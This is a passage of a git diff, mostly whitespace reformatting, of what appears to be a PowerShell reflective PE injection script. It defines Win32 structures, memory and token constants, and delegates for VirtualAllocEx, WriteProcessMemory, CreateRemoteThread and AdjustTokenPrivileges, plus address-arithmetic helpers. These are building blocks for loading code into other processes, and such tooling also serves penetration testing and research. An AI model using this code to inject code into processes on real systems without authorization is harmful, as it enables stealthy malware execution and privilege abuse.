+        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
+
+        #Struct LUID
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
+        $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
+        $LUID = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
+
+        #Struct LUID_AND_ATTRIBUTES
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
+        $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
+        $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
+        $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
+
+        #Struct TOKEN_PRIVILEGES
+        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
+        $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
+        $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
+        $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
+        $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
+        $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
+
+        return $Win32Types
+    }
+
+    Function Get-Win32Constants
+    {
+        $Win32Constants = New-Object System.Object
+
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
+        $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
+
+        return $Win32Constants
+    }
+
+    Function Get-Win32Functions
+    {
+        $Win32Functions = New-Object System.Object
+
+        $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
+        $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
+        $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
+        $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc
+
+        $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
+        $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
+        $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
+        $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx
+
+        $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
+        $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
+        $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy
+
+        $memsetAddr = Get-ProcAddress msvcrt.dll memset
+        $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
+        $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset
+
+        $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
+        $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
+        $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary
+
+        $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
+        $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
+        $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress
+
+        $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress #This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself
+        $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
+        $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate)
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr
+
+        $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
+        $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
+        $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
+        $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree
+
+        $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
+        $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
+        $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
+        $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx
+
+        $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
+        $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
+        $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
+        $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect
+
+        $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
+        $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
+        $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
+        $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
+
+        $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
+        $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
+        $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
+
+        $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
+        $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
+        $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess
+
+        $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
+        $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
+        $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject
+
+        $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
         $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
         $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory
-		
-		$ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory
+
+        $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
         $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
         $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory
-		
-		$CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory
+
+        $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
         $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
         $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread
-		
-		$GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread
+
+        $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
         $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])
         $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread
-		
-		$OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread
+
+        $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
         $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
         $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken
-		
-		$GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken
+
+        $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
         $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])
         $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread
-		
-		$AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread
+
+        $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
         $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
         $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges
-		
-		$LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges
+
+        $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
         $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])
         $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue
-		
-		$ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue
+
+        $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
         $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])
         $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
-		
-		# NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf
+
+        # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP
         if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
-		    $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
+            $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
             $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
             $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
-		    $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
+            $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
         }
-		
-		$IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
+
+        $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
         $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
         $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process
-		
-		$CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process
+
+        $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
         $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
         $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
-		$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread
-		
-		return $Win32Functions
-	}
-	#####################################
-
-			
-	#####################################
-	###########    HELPERS   ############
-	#####################################
-
-	#Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function
-	#This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses
-	Function Sub-SignedIntAsUnsigned
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[Int64]
-		$Value1,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[Int64]
-		$Value2
-		)
-		
-		[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
-		[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
-		[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
-
-		if ($Value1Bytes.Count -eq $Value2Bytes.Count)
-		{
-			$CarryOver = 0
-			for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
-			{
-				$Val = $Value1Bytes[$i] - $CarryOver
-				#Sub bytes
-				if ($Val -lt $Value2Bytes[$i])
-				{
-					$Val += 256
-					$CarryOver = 1
-				}
-				else
-				{
-					$CarryOver = 0
-				}
-				
-				
-				[UInt16]$Sum = $Val - $Value2Bytes[$i]
-
-				$FinalBytes[$i] = $Sum -band 0x00FF
-			}
-		}
-		else
-		{
-			Throw "Cannot subtract bytearrays of different sizes"
-		}
-		
-		return [BitConverter]::ToInt64($FinalBytes, 0)
-	}
-	
-
-	Function Add-SignedIntAsUnsigned
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[Int64]
-		$Value1,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[Int64]
-		$Value2
-		)
-		
-		[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
-		[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
-		[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
-
-		if ($Value1Bytes.Count -eq $Value2Bytes.Count)
-		{
-			$CarryOver = 0
-			for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
-			{
-				#Add bytes
-				[UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
-
-				$FinalBytes[$i] = $Sum -band 0x00FF
-				
-				if (($Sum -band 0xFF00) -eq 0x100)
-				{
-					$CarryOver = 1
-				}
-				else
-				{
-					$CarryOver = 0
-				}
-			}
-		}
-		else
-		{
-			Throw "Cannot add bytearrays of different sizes"
-		}
-		
-		return [BitConverter]::ToInt64($FinalBytes, 0)
-	}
-	
-
-	Function Compare-Val1GreaterThanVal2AsUInt
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[Int64]
-		$Value1,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[Int64]
-		$Value2
-		)
-		
-		[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
-		[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
-
-		if ($Value1Bytes.Count -eq $Value2Bytes.Count)
-		{
-			for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
-			{
-				if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
-				{
-					return $true
-				}
-				elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
-				{
-					return $false
-				}
-			}
-		}
-		else
-		{
-			Throw "Cannot compare byte arrays of different size"
-		}
-		
-		return $false
-	}
-	
-
-	Function Convert-UIntToInt
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[UInt64]
-		$Value
-		)
-		
-		[Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
-		return ([BitConverter]::ToInt64($ValueBytes, 0))
-	}
+        $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread
+
+        return $Win32Functions
+    }
+    #####################################
+
+
+    #####################################
+    ###########    HELPERS   ############
+    #####################################
+
+    #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function
+    #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses
+    Function Sub-SignedIntAsUnsigned
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [Int64]
+        $Value1,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [Int64]
+        $Value2
+        )
+
+        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
+        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
+        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
+
+        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
+        {
+            $CarryOver = 0
+            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
+            {
+                $Val = $Value1Bytes[$i] - $CarryOver
+                #Sub bytes
+                if ($Val -lt $Value2Bytes[$i])
+                {
+                    $Val += 256
+                    $CarryOver = 1
+                }
+                else
+                {
+                    $CarryOver = 0
+                }
+
+                [UInt16]$Sum = $Val - $Value2Bytes[$i]
+
+                $FinalBytes[$i] = $Sum -band 0x00FF
+            }
+        }
+        else
+        {
+            Throw "Cannot subtract bytearrays of different sizes"
+        }
+
+        return [BitConverter]::ToInt64($FinalBytes, 0)
+    }
+
+    Function Add-SignedIntAsUnsigned
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [Int64]
+        $Value1,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [Int64]
+        $Value2
+        )
+
+        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
+        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
+        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
+
+        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
+        {
+            $CarryOver = 0
+            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
+            {
+                #Add bytes
+                [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
+
+                $FinalBytes[$i] = $Sum -band 0x00FF
+
+                if (($Sum -band 0xFF00) -eq 0x100)
+                {
+                    $CarryOver = 1
+                }
+                else
+                {
+                    $CarryOver = 0
+                }
+            }
+        }
+        else
+        {
+            Throw "Cannot add bytearrays of different sizes"
+        }
+
+        return [BitConverter]::ToInt64($FinalBytes, 0)
+    }
+
+    Function Compare-Val1GreaterThanVal2AsUInt
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [Int64]
+        $Value1,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [Int64]
+        $Value2
+        )
+
+        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
+        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
+
+        if ($Value1Bytes.Count -eq $Value2Bytes.Count)
+        {
+            for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
+            {
+                if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
+                {
+                    return $true
+                }
+                elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
+                {
+                    return $false
+                }
+            }
+        }
+        else
+        {
+            Throw "Cannot compare byte arrays of different size"
+        }
+
+        return $false
+    }
+
+
+    Function Convert-UIntToInt
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [UInt64]
+        $Value
+        )
+
+        [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
+        return ([BitConverter]::ToInt64($ValueBytes, 0))
+    }
 
 
     Function Get-Hex
@@ -892,964 +894,951 @@ $RemoteScriptBlock = {
 
         return $Hex
     }
-	
-	
-	Function Test-MemoryRangeValid
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[String]
-		$DebugString,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$PEInfo,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[IntPtr]
-		$StartAddress,
-		
-		[Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
-		[IntPtr]
-		$Size
-		)
-		
-	    [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
-		
-		$PEEndAddress = $PEInfo.EndAddress
-		
-		if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
-		{
-			Throw "Trying to write to memory smaller than allocated address range. $DebugString"
-		}
-		if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
-		{
-			Throw "Trying to write to memory greater than allocated address range. $DebugString"
-		}
-	}
-	
-	
-	Function Write-BytesToMemory
-	{
-		Param(
-			[Parameter(Position=0, Mandatory = $true)]
-			[Byte[]]
-			$Bytes,
-			
-			[Parameter(Position=1, Mandatory = $true)]
-			[IntPtr]
-			$MemoryAddress
-		)
-	
-		for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
-		{
-			[System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
-		}
-	}
-	
-
-	#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
-	Function Get-DelegateType
-	{
-	    Param
-	    (
-	        [OutputType([Type])]
-	        
-	        [Parameter( Position = 0)]
-	        [Type[]]
-	        $Parameters = (New-Object Type[](0)),
-	        
-	        [Parameter( Position = 1 )]
-	        [Type]
-	        $ReturnType = [Void]
-	    )
-
-	    $Domain = [AppDomain]::CurrentDomain
-	    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
-	    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
-	    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
-	    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
-	    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
-	    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
-	    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
-	    $MethodBuilder.SetImplementationFlags('Runtime, Managed')
-	    
-	    Write-Output $TypeBuilder.CreateType()
-	}
-
-
